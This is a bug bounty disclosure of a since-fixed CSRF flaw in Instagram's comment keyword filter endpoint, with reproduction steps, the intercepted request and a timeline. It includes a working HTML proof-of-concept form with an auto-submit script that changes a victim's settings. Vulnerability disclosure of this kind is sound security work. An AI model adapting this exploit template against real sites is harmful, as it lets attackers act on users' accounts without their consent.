CSRF in Instagram
Description/Impact:
An attacker was able to change the comment keyword filter on behalf of other users on Instagram.com by exploiting a CSRF vulnerability. After this vulnerability was reported, Facebook's internal research found other vulnerable endpoints which might lead to account takeover.
Reproduction steps:
Step 1: open https://www.instagram.com/accounts/comment_filter/
Step 2: add any keyword and intercept the request
POST /accounts/set_comment_filter_keywords_web/ HTTP/1.1
Host: www.instagram.com
In the request there is an interesting header, X-CSRFTOKEN. This header is meant to verify that the request is coming from the owner of the account.
When this header is deleted, the request is still sent successfully and returns the response:
HTTP 200 OK
{"status": "ok"}
Here we can notice that there is no check of the CSRF token.
Step 3: write the exploit for this vulnerability
<html>
  <head>
    <title>exploit csrf</title>
  </head>
  <body>
    <form action="https://www.instagram.com/accounts/set_comment_filter_keywords_web/" method="POST">
      <input type="hidden" name="keywords" value="test" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
You can also add an auto-submit script after the form:
<script>
  document.forms[0].submit();
</script>
Here we can notice that neither the X-CSRFTOKEN header nor the Origin header is checked.
After the initially reported bug was fixed, further internal research identified other vulnerable endpoints.
Timeline:
16/01/2021: I sent the report
19/01/2021: Acknowledged by Facebook
22/02/2021: Fixed and bounty awarded